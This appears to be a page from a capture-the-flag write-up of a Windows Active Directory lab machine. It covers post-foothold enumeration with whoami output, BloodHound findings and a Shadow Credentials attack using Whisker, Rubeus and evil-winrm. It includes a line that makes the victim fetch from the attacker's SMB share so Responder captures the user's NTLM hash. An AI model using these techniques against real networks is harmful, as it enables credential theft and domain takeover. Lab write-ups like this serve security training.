search

Enumeration

circle-check

One of the things we can do after gaining a foothold like this when we don't have credentials for the user btables, we can run responder on our machine and use command Get-Content \\our_ip\test\test, to get this users hash that we can then crack offline.

whoami /all

USER INFORMATION
----------------

User Name        SID                                         
================ ============================================
outdated\btables S-1-5-21-4089647348-67660539-4016542185-1106


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                          Attributes                                        
========================================== ================ ============================================ ==================================================
Everyone                                   Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                      Mandatory group, Enabled by default, Enabled group
OUTDATED\ITStaff                           Group            S-1-5-21-4089647348-67660539-4016542185-1107 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192                                                                                    


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

After running sharphound its time to get the .zip file with SMB

hashtag
BloodHound

circle-info

The members of the group [email protected] have the ability to write to the "msds-KeyCredentialLink" property on [email protected]. Writing to this property allows an attacker to create "Shadow Credentials" on the object and authenticate as the principal using kerberos PKINIT.

This attack is called exploiting Shadow Credentials and this postarrow-up-right explains it really well.

We need a tool called Whisker.exe. After downloading it as w.exe:

And then we just have to run the Rubeus command.

Using the NTLM hash I was able to log in with evil-winrm

So now we are on the actual DC instead of the virtualised CLIENT machine.

PreviousFootholdNextPrivEsc

Last updated